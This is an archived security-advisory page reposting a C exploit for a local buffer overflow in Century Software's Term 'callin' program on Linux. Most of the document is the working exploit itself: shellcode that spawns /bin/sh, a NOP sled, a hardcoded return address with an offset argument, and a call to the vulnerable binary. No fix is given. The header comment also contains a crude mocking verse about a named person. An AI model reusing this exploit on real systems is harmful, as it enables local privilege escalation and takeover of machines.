27th Feb 2002 [SBWID-5144]
COMMAND
Century\'s Linux Term local buffer overflow
SYSTEMS AFFECTED
??
PROBLEM
Haiku Hacker posted :
/********************************************************/
/* ex-callin.c - Haiku Hacker <haiku@hushmail.com> */
/* Exploits the buffer overflow in Century Software\'s */
/* calling component of the Term program for Linux. */
/********************************************************/
/* Greets, love, and respect to: */
/* KF, Merc, Synapse, UPT old and new, Lance Spitzner, */
/* egami, comega, jericho, and most importantly sl1k */
/* for his guidance, coaching, and tutoring. */
/********************************************************/
/* RFP\'s Pants */
/* ----------- */
/* Rain Forest Puppy */
/* Wears tight black pants to big cons */
/* Does he have limp wrist? */
/********************************************************/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/* use this to specify the location of callin */
#define CINPATH \"./callin\"
int main(int argc, char **argv)
{
/* Shellcode borrowed from Aleph1 */
char shellcode[] =
\"\\x29\\xc0\\x29\\xdb\\x29\\xc9\\x29\\xd2\\xb0\\xa4\\xcd\\x80\"
\"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\"
\"\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\"
\"\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\\x80\\xe8\\xdc\\xff\"
\"\\xff\\xff/bin/sh\";
char egg_string[300];
int i;
unsigned long offset = 0;
if (argc > 1)
{
offset = atoi(argv[1]);
}
memcpy(egg_string, \"tty\", 3);
for (i = 3; i < 95; i++)
egg_string[i] = \'A\';
*(long *)(egg_string+95) = 0xbffff67c + offset;
for (i = 99; i < 300; i++)
egg_string[i] = 0x90;
strcpy(egg_string+(sizeof(egg_string)-strlen(shellcode)), shellcode);
execl(CINPATH, \"callin\", egg_string, 0);
}
SOLUTION
??
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH
